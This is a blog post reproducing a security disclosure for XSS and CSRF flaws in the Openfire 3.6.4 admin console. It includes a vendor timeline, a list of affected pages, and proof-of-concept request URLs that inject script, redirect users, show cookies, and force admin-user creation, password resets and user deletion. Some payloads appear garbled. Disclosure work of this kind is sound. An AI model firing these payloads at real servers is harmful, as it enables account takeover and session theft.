Multiple XSS and XSRF issues in Openfire 3.6.4

I recently (read: last month) disclosed several security issues with Ignite Realtime’s Openfire v3.6.4. The following links are the original advisory postings and the exploit code:
http://www.securityfocus.com/bid/45682
http://secunia.com/advisories/42799
http://packetstormsecurity.org/files/author/8144/
http://www.exploit-db.com/exploits/15918/


The following is the condensed disclosure document for the vulnerabilities.:
Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section
——————————————————————–

Project: Openfire
Severity: High
Versions: 3.6.4 (other versions may be affected)
Exploit type: Multiple XSS and CSRF
Fixes Available: None
——————————————————————–

Timeline:
14 October 2010: Vendor Contacted
15 October 2010: Vendor Response received. Asks to verify the issues in beta.
28 October 2010: Informed Vendor that multiple pages are still vulnerable
03 November 2010: Acknowledgement / Update requested
03 November 2010: Update recevied. No fixes initiated.
23 November 2010: Informed vendor disclosure date set to 1/12/2010
22 December 2010: Update requested.
22 December 2010: Vendor asks to release information as the vulnerabilities are already known
23 December 2010: A different contact at the Vendor location informs that there are no updates.
24 December 2010: Disclosure date set to 5 January 2011
05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia
——————————————————————–

Product Description:
Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.
(Source: http://www.igniterealtime.org/projects/openfire/)
——————————————————————–

Affected Files/Locations/Modules:
XSS:
login.jsp
security-audit-viewer.jsp
user-create.jsp
plugins/search/advance-user-search.jsp
user-roster-add.jsp
user-roster.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp
muc-room-edit-form.jsp
muc-room-delete.jsp
plugins/clientcontrol/create-bookmark.jsp
plugins/clientcontrol/spark-form.jsp

CSRF:
user-create.jsp
user-password.jsp
user-delete.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp

———————————————————————

Vulnerability Details:
User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

Since the vulnerabilities exisit in the administrative module, a sucessful attack could cause a complete compromise of the entire application.

An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.
———————————————————————-

Proof of Concept:
Persistent XSS:
http://target-url/login.jsp?url=&username=test” onfocus=javascript:window.location.assign(‘http://www.google.com’);”>

http://target-url/login.jsp?url=hello” onfocus=javascript:window.location.assign(‘http://www.google.com’);”>

http://target-url/security-audit-viewer.jsp?range=15&username=”>alert(‘xss’)&search=Search

http://target-url/user-create.jsp?username=test”>alert(‘xss’)
http://target-url/user-create.jsp?name=test”>alert(‘xss’)
http://target-url/user-create.jsp?email=test”>alert(‘xss’)

http://target-url/plugins/search/advance-user-search.jsp?criteria=test”>alert(‘xss’)

http://target-url/user-roster-add.jsp?username=testalert(‘xss’)
http://target-url/user-roster-add.jsp?username=user&jid=1&nickname=alert(‘XSS’)&email=alert(‘XSS’)&add=Add+Item

http://target-url/user-roster.jsp?username=testalert(document.cookie)
http://target-url/user-lockout.jsp?username=testalert(‘xss’)

http://target-url/group-create.jsp?name=testalert(‘xss’)&description=alert(‘xss’)&create=Create+Group

http://target-url/group-edit.jsp?creategroupsuccess=true&group=testalert(‘xss’)

http://target-url/group-delete.jsp?group=alert(‘xss’)

http://target-url/muc-room-edit-form.jsp?save=true&create=”>alert(‘XSS’)&roomconfig_persistentroom=”>alert(‘XSS’)&roomName=23&mucName=conference&roomconfig_roomname=alert(‘XSS’)&roomconfig_roomdesc=alert(‘XSS’)&room_topic=alert(‘XSS’)&roomconfig_maxusers=”>alert(‘XSS’)&roomconfig_presencebroadcast=alert(‘XSS’)true&roomconfig_presencebroadcast2=”>alert(‘XSS’)&roomconfig_presencebroadcast3=true”>alert(‘XSS’)&roomconfig_roomsecret=”>alert(‘XSS’)&roomconfig_roomsecret2=”>alert(‘XSS’)&roomconfig_whois=moderator”>alert(‘XSS’)&roomconfig_publicroom=true”>alert(‘XSS’)&roomconfig_canchangenick=true”>alert(‘XSS’)&roomconfig_registration=true”>alert(‘XSS’)&Submit=Save+Changes

http://target-url/muc-room-delete.jsp?roomJID=”>alert(‘XSS’)&create=false

http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName=”>alert(‘XSS’)&url=”>alert(‘XSS’)&users=”>alert(‘XSS’)&groups=”>alert(‘XSS’)&rss=off&createURLBookmark=Create&type=url

http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=alert(‘XSS’)&submit=Update+Spark+Versions

Stored XSS:
http://target-url/group-create.jsp
http://target-url/group-summary.jsp
Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.
Group Name: Testalert(“xss”)
Description: Testalert(“xss”)
Click on Create Group, you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes completing the PoC.

CSRF:
For the following links, create html pages with image tags with scr= the following links and ask the user to view these pages. If a user is logged into Openfire’s admin console and the HTML pages are viewed then the respective functions are called:
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User>
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password>
http://target-url/user-delete.jsp?username=tester&delete=Delete+User
http://target-url/user-delete.jsp?username=tester&delete=Delete+User>
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group>
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add>
http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update
http://target-url/group-edit.jsp?group=NewGroup&admin=abc@example.com&updateMember=Update>

———————————————————————